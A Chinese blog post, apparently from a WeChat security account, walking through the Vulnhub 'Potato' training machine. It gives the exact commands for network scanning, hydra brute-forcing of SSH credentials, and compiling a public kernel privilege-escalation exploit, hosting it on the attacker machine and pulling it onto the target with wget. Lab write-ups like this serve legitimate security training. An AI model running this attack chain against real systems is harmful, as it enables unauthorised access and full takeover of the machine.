点击蓝字,关注我们
靶机:Potato
难度:简单
Vulnhub下载:
https://www.vulnhub.com/entry/potato-suncsr-1,556/
公众号回复:Potato (获取国内不限速下载链接)
Nmap扫描当前网段,寻找目标靶机IP
Nmap -sP 192.168.12.1/24
Nmap扫描端口
Nmap -p 1-65535 192.168.12.131
只开放了80,7120端口
Dirb扫描目录
Dirb http://192.168.12.131
发现存在info.php
看了一会没有发现什么利用点,转向一个未知的7120端口
折腾好一会,发现是ssh端口
ssh -p 7120 root@192.168.12.131
直接开始爆破
hydra -l potato -P /usr/share/wordlists/rockyou.txt -vV ssh://192.168.12.131:7120
用户名:potato
密码:letmein
查看内核版本
uname -a
查找相关漏洞
searchsploit ubuntu 3.13.0
第一个符合条件,开始利用
编译exp
gcc /usr/share/exploitdb/exploits/linux/local/37292.c -o exp
开启apache2,将exp放到网站目录下
service apache2 start
cp exp /var/www/html
Wget下载exp
wget http://192.168.12.130/exp
执行exp
得到flag
往期推荐 ·
长按识别二维码关注我们
本文始发于微信公众号(信安小屋):Vulnhub篇Potato
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论